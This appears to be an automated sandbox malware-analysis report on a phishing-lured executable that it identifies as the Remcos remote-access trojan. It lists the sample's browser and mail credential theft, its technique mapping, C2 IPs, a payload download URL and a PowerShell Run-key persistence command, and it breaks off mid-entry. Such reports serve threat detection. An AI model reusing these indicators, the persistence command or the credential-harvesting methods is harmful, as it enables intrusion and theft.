            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\key4.dbJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqliteJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeKey opened: HKEY_CURRENT_USER\Software\PaltalkJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live MailJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeCode function: ESMTPPassword13_2_004033F0
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword13_2_00402DB3
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword13_2_00402DB3
            Source: Yara matchFile source: Process Memory Space: lftebevgelserne.exe PID: 5744, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: lftebevgelserne.exe PID: 2824, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: C:\Users\user\AppData\Local\Temp\lftebevgelserne.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-QGLBE0Jump to behavior
            Source: Yara matchFile source: 00000005.00000002.3960470900.000000000287A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3960470900.0000000002858000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3960470900.0000000002867000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: lftebevgelserne.exe PID: 5744, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Windows Management Instrumentation
            1
            DLL Side-Loading
            1
            DLL Side-Loading
            1
            Deobfuscate/Decode Files or Information
            1
            OS Credential Dumping
            1
            System Time Discovery
            Remote Services1
            Archive Collected Data
            1
            Ingress Tool Transfer
            Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault Accounts11
            Native API
            1
            Registry Run Keys / Startup Folder
            1
            Access Token Manipulation
            2
            Obfuscated Files or Information
            2
            Credentials in Registry
            1
            Account Discovery
            Remote Desktop Protocol1
            Data from Local System
            2
            Encrypted Channel
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts2
            Command and Scripting Interpreter
            Logon Script (Windows)412
            Process Injection
            2
            Software Packing
            1
            Credentials In Files
            2
            File and Directory Discovery
            SMB/Windows Admin Shares1
            Email Collection
            1
            Non-Standard Port
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal Accounts1
            PowerShell
            Login Hook1
            Registry Run Keys / Startup Folder
            1
            DLL Side-Loading
            NTDS129
            System Information Discovery
            Distributed Component Object Model2
            Clipboard Data
            1
            Remote Access Software
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Masquerading
            LSA Secrets131
            Security Software Discovery
            SSHKeylogging2
            Non-Application Layer Protocol
            Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Modify Registry
            Cached Domain Credentials21
            Virtualization/Sandbox Evasion
            VNCGUI Input Capture12
            Application Layer Protocol
            Data Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items21
            Virtualization/Sandbox Evasion
            DCSync4
            Process Discovery
            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            Access Token Manipulation
            Proc Filesystem1
            Application Window Discovery
            Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
            Process Injection
            /etc/passwd and /etc/shadow1
            System Owner/User Discovery
            Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1535971 Sample: Priority_Quote_Request_Item... Startdate: 17/10/2024 Architecture: WINDOWS Score: 100 45 geoplugin.net 2->45 47 198.187.3.20.in-addr.arpa 2->47 57 Suricata IDS alerts for network traffic 2->57 59 Found malware configuration 2->59 61 Yara detected Remcos RAT 2->61 63 4 other signatures 2->63 10 Priority_Quote_Request_Items_List.exe 16 2->10         started        signatures3 process4 process5 12 powershell.exe 28 10->12         started        file6 35 C:\Users\user\AppData\...\lftebevgelserne.exe, PE32 12->35 dropped 37 C:\...\lftebevgelserne.exe:Zone.Identifier, ASCII 12->37 dropped 71 Early bird code injection technique detected 12->71 73 Writes to foreign memory regions 12->73 75 Found suspicious powershell code related to unpacking or dynamic code loading 12->75 77 3 other signatures 12->77 16 lftebevgelserne.exe 5 14 12->16         started        20 conhost.exe 12->20         started        signatures7 process8 dnsIp9 39 185.150.191.117, 4609, 58047, 58048 RELIABLESITEUS United States 16->39 41 103.72.57.120, 58046, 80 NETEASE-ASGuangzhouNetEaseComputerSystemCoLtdCN India 16->41 43 geoplugin.net 178.237.33.50, 58049, 80 ATOM86-ASATOM86NL Netherlands 16->43 49 Detected unpacking (changes PE section rights) 16->49 51 Detected Remcos RAT 16->51 53 Tries to steal Mail credentials (via file registry) 16->53 55 2 other signatures 16->55 22 lftebevgelserne.exe 1 16->22         started        25 lftebevgelserne.exe 1 16->25         started        27 lftebevgelserne.exe 14 16->27         started        29 cmd.exe 1 16->29         started        signatures10 process11 signatures12 65 Tries to steal Instant Messenger accounts or passwords 22->65 67 Tries to harvest and steal browser information (history, passwords, etc) 22->67 69 Tries to steal Mail credentials (via file / registry access) 25->69 31 conhost.exe 29->31         started        33 reg.exe 1 1 29->33         started        process13

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            Priority_Quote_Request_Items_List.exe5%ReversingLabs
            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\lftebevgelserne.exe5%ReversingLabs
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            http://geoplugin.net/json.gp0%URL Reputationsafe
            http://www.imvu.comr0%URL Reputationsafe
            http://www.imvu.com0%URL Reputationsafe
            https://login.yahoo.com/config/login0%URL Reputationsafe
            http://nsis.sf.net/NSIS_ErrorError0%URL Reputationsafe
            http://www.ebuddy.com0%URL Reputationsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            geoplugin.net
            178.237.33.50
            truefalse
              unknown
              198.187.3.20.in-addr.arpa
              unknown
              unknownfalse
                unknown
                NameMaliciousAntivirus DetectionReputation
                http://geoplugin.net/json.gpfalse
                • URL Reputation: safe
                unknown
                http://103.72.57.120/diddyishere/YyHolEVWoHsYmSFIbeB57.binfalse
                  unknown
                  NameSourceMaliciousAntivirus DetectionReputation
                  https://www.google.comlftebevgelserne.exe, lftebevgelserne.exe, 0000000E.00000002.2019884187.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                    unknown
                    http://geoplugin.net/json.gpClftebevgelserne.exe, 00000005.00000002.3960470900.0000000002858000.00000004.00000020.00020000.00000000.sdmpfalse
                      unknown
                      http://www.imvu.comrlftebevgelserne.exe, 00000005.00000002.3974075181.000000001F200000.00000040.10000000.00040000.00000000.sdmp, lftebevgelserne.exe, 0000000E.00000002.2019884187.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://geoplugin.net/json.gpLlftebevgelserne.exe, 00000005.00000002.3960470900.0000000002867000.00000004.00000020.00020000.00000000.sdmpfalse
                        unknown
                        http://geoplugin.net/json.gpllftebevgelserne.exe, 00000005.00000002.3960470900.0000000002858000.00000004.00000020.00020000.00000000.sdmp, lftebevgelserne.exe, 00000005.00000002.3960470900.0000000002867000.00000004.00000020.00020000.00000000.sdmpfalse
                          unknown
                          http://www.imvu.comlftebevgelserne.exe, lftebevgelserne.exe, 0000000E.00000002.2019884187.0000000000400000.00000040.80000000.00040000.00000000.sdmp, lftebevgelserne.exe, 0000000E.00000003.2019679969.00000000008AD000.00000004.00000020.00020000.00000000.sdmp, lftebevgelserne.exe, 0000000E.00000003.2019730617.00000000008AD000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://www.google.com/accounts/serviceloginlftebevgelserne.exefalse
                            unknown
                            http://geoplugin.net/json.gpqlftebevgelserne.exe, 00000005.00000002.3960470900.0000000002838000.00000004.00000020.00020000.00000000.sdmpfalse
                              unknown
                              https://login.yahoo.com/config/loginlftebevgelserne.exefalse
                              • URL Reputation: safe
                              unknown
                              http://geoplugin.net/json.gp8lftebevgelserne.exe, 00000005.00000002.3960470900.0000000002858000.00000004.00000020.00020000.00000000.sdmpfalse
                                unknown
                                http://www.nirsoft.netlftebevgelserne.exe, 0000000C.00000002.2040515314.0000000000193000.00000004.00000010.00020000.00000000.sdmpfalse
                                  unknown
                                  http://nsis.sf.net/NSIS_ErrorErrorPriority_Quote_Request_Items_List.exe, lftebevgelserne.exe.2.drfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://geoplugin.net/json.gpUlftebevgelserne.exe, 00000005.00000002.3960470900.0000000002867000.00000004.00000020.00020000.00000000.sdmpfalse
                                    unknown
                                    http://www.nirsoft.net/lftebevgelserne.exe, 0000000E.00000002.2019884187.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                      unknown
                                      http://www.imvu.comatalftebevgelserne.exe, 0000000E.00000003.2019679969.00000000008AD000.00000004.00000020.00020000.00000000.sdmp, lftebevgelserne.exe, 0000000E.00000003.2019730617.00000000008AD000.00000004.00000020.00020000.00000000.sdmpfalse
                                        unknown
                                        http://103.72.57.120/diddyishere/YyHolEVWoHsYmSFIbeB57.binllftebevgelserne.exe, 00000005.00000002.3960470900.0000000002838000.00000004.00000020.00020000.00000000.sdmpfalse
                                          unknown
                                          http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.comlftebevgelserne.exe, 00000005.00000002.3974075181.000000001F200000.00000040.10000000.00040000.00000000.sdmp, lftebevgelserne.exe, 0000000E.00000002.2019884187.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                            unknown
                                            http://www.ebuddy.comlftebevgelserne.exe, lftebevgelserne.exe, 0000000E.00000002.2019884187.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            • No. of IPs < 25%
                                            • 25% < No. of IPs < 50%
                                            • 50% < No. of IPs < 75%
                                            • 75% < No. of IPs
                                            IPDomainCountryFlagASNASN NameMalicious
                                            185.150.191.117
                                            unknownUnited States
                                            23470RELIABLESITEUStrue
                                            103.72.57.120
                                            unknownIndia
                                            45062NETEASE-ASGuangzhouNetEaseComputerSystemCoLtdCNfalse
                                            178.237.33.50
                                            geoplugin.netNetherlands
                                            8455ATOM86-ASATOM86NLfalse
                                            Joe Sandbox version:41.0.0 Charoite
                                            Analysis ID:1535971
                                            Start date and time:2024-10-17 14:31:07 +02:00
                                            Joe Sandbox product:CloudBasic
                                            Overall analysis duration:0h 9m 16s
                                            Hypervisor based Inspection enabled:false
                                            Report type:full
                                            Cookbook file name:default.jbs
                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                            Number of analysed new started processes analysed:16
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:0
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Sample name:Priority_Quote_Request_Items_List.exe
                                            Detection:MAL
                                            Classification:mal100.phis.troj.spyw.evad.winEXE@17/16@2/3
                                            EGA Information:
                                            • Successful, ratio: 100%
                                            HCA Information:
                                            • Successful, ratio: 97%
                                            • Number of executed functions: 167
                                            • Number of non-executed functions: 326
                                            Cookbook Comments:
                                            • Found application associated with file extension: .exe
                                            • Override analysis time to 240000 for current running targets taking high CPU consumption
                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                            • Not all processes where analyzed, report is missing behavior information
                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                            • Report size getting too big, too many NtReadVirtualMemory calls found.
                                            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                            • VT rate limit hit for: Priority_Quote_Request_Items_List.exe
                                            TimeTypeDescription
                                            08:32:15API Interceptor35x Sleep call for process: powershell.exe modified
                                            08:33:37API Interceptor3134041x Sleep call for process: lftebevgelserne.exe modified
                                            14:32:57AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Startup key %Wende% -windowstyle 1 $Pertline=(gp -Path 'HKCU:\Software\Platanus\').Grundtankerne;%Wende% ($Pertline)
                                            14:33:06AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Startup key %Wende% -windowstyle 1 $Pertline=(gp -Path 'HKCU:\Software\Platanus\').Grundtankerne;%Wende% ($Pertline)
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            185.150.191.117IMG_0055-09062024 SJGYNIQKMJ.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                                              Za41nm8pup.exeGet hashmaliciousRemcosBrowse
                                                SecuriteInfo.com.Win32.DropperX-gen.5166.30540.exeGet hashmaliciousRemcosBrowse
                                                  Ravakhu24105.exeGet hashmaliciousRemcosBrowse
                                                    103.72.57.120Evolog_sprawy24-4090.scr.exeGet hashmaliciousUnknownBrowse
                                                    • 103.72.57.120/diddyishere/Mepvmtfzu.mp3
                                                    Evolog_sprawy24-4090.scr.exeGet hashmaliciousUnknownBrowse
                                                    • 103.72.57.120/diddyishere/Mepvmtfzu.mp3
                                                    178.237.33.50SKU_0001710-1-2024-SX-3762.batGet hashmaliciousRemcos, GuLoaderBrowse
                                                    • geoplugin.net/json.gp
                                                    SWIFT COPY.xlsGet hashmaliciousRemcosBrowse
                                                    • geoplugin.net/json.gp
                                                    Proof_of_Payment 08637.exeGet hashmaliciousRemcosBrowse
                                                    • geoplugin.net/json.gp
                                                    New Order.exeGet hashmaliciousRemcosBrowse
                                                    • geoplugin.net/json.gp
                                                    PO OCTOBER 2024 _ PDF.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                    • geoplugin.net/json.gp
                                                    17290972859113f7995b23df55ec0b2b7ae16822e0e59b575d2cfb603e79ed2793266980db734.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                    • geoplugin.net/json.gp
                                                    1729097285e3762b77689e8a42c1dbcef03f73271c1f3d5846d063e03830c041710b98532d536.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                    • geoplugin.net/json.gp
                                                    17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                    • geoplugin.net/json.gp
                                                    ge5AHaHgsn.exeGet hashmaliciousRemcosBrowse
                                                    • geoplugin.net/json.gp
                                                    YysMIxESRE.exeGet hashmaliciousRemcosBrowse
                                                    • geoplugin.net/json.gp
                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    geoplugin.netSKU_0001710-1-2024-SX-3762.batGet hashmaliciousRemcos, GuLoaderBrowse
                                                    • 178.237.33.50
                                                    SWIFT COPY.xlsGet hashmaliciousRemcosBrowse
                                                    • 178.237.33.50
                                                    Proof_of_Payment 08637.exeGet hashmaliciousRemcosBrowse
                                                    • 178.237.33.50
                                                    New Order.exeGet hashmaliciousRemcosBrowse
                                                    • 178.237.33.50
                                                    PO OCTOBER 2024 _ PDF.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                    • 178.237.33.50
                                                    17290972859113f7995b23df55ec0b2b7ae16822e0e59b575d2cfb603e79ed2793266980db734.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                    • 178.237.33.50
                                                    1729097285e3762b77689e8a42c1dbcef03f73271c1f3d5846d063e03830c041710b98532d536.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                    • 178.237.33.50
                                                    17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                    • 178.237.33.50
                                                    ge5AHaHgsn.exeGet hashmaliciousRemcosBrowse
                                                    • 178.237.33.50
                                                    YysMIxESRE.exeGet hashmaliciousRemcosBrowse
                                                    • 178.237.33.50
                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    RELIABLESITEUSppc.elfGet hashmaliciousMiraiBrowse
                                                    • 154.16.151.108
                                                    20240930_185453_p1uYhraXAa8FqoQDzs1lqwv0Fp3NVQrL.emlGet hashmaliciousGRQ ScamBrowse
                                                    • 104.238.220.6
                                                    https://pub-c5538851da6244d790b9ba2a84c8b2af.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                                    • 104.194.8.184
                                                    na.elfGet hashmaliciousMiraiBrowse
                                                    • 45.126.216.243
                                                    x86.elfGet hashmaliciousMiraiBrowse
                                                    • 154.16.151.105
                                                    https://oaemk-f29f.hmnaitswiaa.workers.dev/Get hashmaliciousHTMLPhisherBrowse
                                                    • 104.194.8.184
                                                    http://sanjaygowda23.github.io/netflix-homepageGet hashmaliciousHTMLPhisherBrowse
                                                    • 104.194.8.184
                                                    https://fiecreta.eventsinindonesia.com/eARyerseGet hashmaliciousUnknownBrowse
                                                    • 104.238.220.6
                                                    http://loglnmicrosoftonl365.Globalfoundries.vitoriorefrigeracao.com.br/excel/active/test@globalfoundries.comGet hashmaliciousUnknownBrowse
                                                    • 172.93.106.72
                                                    Confirmation Receipt.xlsGet hashmaliciousUnknownBrowse
                                                    • 104.243.38.54
                                                    NETEASE-ASGuangzhouNetEaseComputerSystemCoLtdCNEvolog_sprawy24-4090.scr.exeGet hashmaliciousUnknownBrowse
                                                    • 103.72.57.120
                                                    Evolog_sprawy24-4090.scr.exeGet hashmaliciousUnknownBrowse
                                                    • 103.72.57.120
                                                    firmware.i586.elfGet hashmaliciousUnknownBrowse
                                                    • 42.186.168.227
                                                    KKveTTgaAAsecNNaaaa.m68k.elfGet hashmaliciousUnknownBrowse
                                                    • 45.253.148.9
                                                    mirai.spc.elfGet hashmaliciousMiraiBrowse
                                                    • 42.186.162.7
                                                    #U00bb#U00f1#U00c8#U00a1#U00b4#U00f3#U00c7#U00f812.exeGet hashmaliciousUnknownBrowse
                                                    • 42.186.29.91
                                                    icLkiPQcn4.elfGet hashmaliciousMiraiBrowse
                                                    • 42.187.28.112
                                                    SecuriteInfo.com.Trojan.DownLoader5.404.23382.24035.exeGet hashmaliciousUnknownBrowse
                                                    • 123.58.180.39
                                                    us1fzeuiZj.elfGet hashmaliciousUnknownBrowse
                                                    • 223.252.212.245
                                                    WKpQLqsTJC.elfGet hashmaliciousMiraiBrowse
                                                    • 59.111.234.140
                                                    ATOM86-ASATOM86NLSKU_0001710-1-2024-SX-3762.batGet hashmaliciousRemcos, GuLoaderBrowse
                                                    • 178.237.33.50
                                                    SWIFT COPY.xlsGet hashmaliciousRemcosBrowse
                                                    • 178.237.33.50
                                                    Proof_of_Payment 08637.exeGet hashmaliciousRemcosBrowse
                                                    • 178.237.33.50
                                                    New Order.exeGet hashmaliciousRemcosBrowse
                                                    • 178.237.33.50
                                                    PO OCTOBER 2024 _ PDF.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                    • 178.237.33.50
                                                    17290972859113f7995b23df55ec0b2b7ae16822e0e59b575d2cfb603e79ed2793266980db734.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                    • 178.237.33.50
                                                    1729097285e3762b77689e8a42c1dbcef03f73271c1f3d5846d063e03830c041710b98532d536.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                    • 178.237.33.50
                                                    17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                    • 178.237.33.50
                                                    ge5AHaHgsn.exeGet hashmaliciousRemcosBrowse
                                                    • 178.237.33.50
                                                    YysMIxESRE.exeGet hashmaliciousRemcosBrowse
                                                    • 178.237.33.50
                                                    No context
                                                    No context
                                                    Process:C:\Users\user\AppData\Local\Temp\lftebevgelserne.exe
                                                    File Type:JSON data
                                                    Category:dropped
                                                    Size (bytes):957
                                                    Entropy (8bit):5.0066301715842645
                                                    Encrypted:false
                                                    SSDEEP:24:qXdVauKyGX85jHf3SvXhNlT3/7YvfbYro:6ba0GX85mvhjTkvfEro
                                                    MD5:09BC68DFB56F7449631EBD54736170C5
                                                    SHA1:AD2F67F875D52D157C3D987831B90685B680B50A
                                                    SHA-256:D71FB637AF6D693D88BA66E02D42E49DD95648BCAC92AE7AD927C221EC77FF84
                                                    SHA-512:AA22D93DFF72395C2E30816A0508403CEC2B94D1E9A82CF702D0437134B053178CA40EC7AAF6275E5FF672277A86E98ADF6BA8B5A2250E0E9664DB04AA7B4B80
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview:{. "geoplugin_request":"173.254.250.82",. "geoplugin_status":200,. "geoplugin_delay":"2ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"Killeen",. "geoplugin_region":"Texas",. "geoplugin_regionCode":"TX",. "geoplugin_regionName":"Texas",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"625",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"31.0065",. "geoplugin_longitude":"-97.8406",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/Chicago",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:data
                                                    Category:modified
                                                    Size (bytes):14744
                                                    Entropy (8bit):4.992175361088568
                                                    Encrypted:false
                                                    SSDEEP:384:f1VoGIpN6KQkj2qkjh4iUxehQJKoxOdBMNXp5YYo0ib4J:f1V3IpNBQkj2Ph4iUxehIKoxOdBMNZiA
                                                    MD5:A35685B2B980F4BD3C6FD278EA661412
                                                    SHA1:59633ABADCBA9E0C0A4CD5AAE2DD4C15A3D9D062
                                                    SHA-256:3E3592C4BA81DC975DF395058DAD01105B002B21FC794F9015A6E3810D1BF930
                                                    SHA-512:70D130270CD7DB757958865C8F344872312372523628CB53BADE0D44A9727F9A3D51B18B41FB04C2552BCD18FAD6547B9FD0FA0B016583576A1F0F1A16CB52EC
                                                    Malicious:false
                                                    Reputation:moderate, very likely benign file
                                                    Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
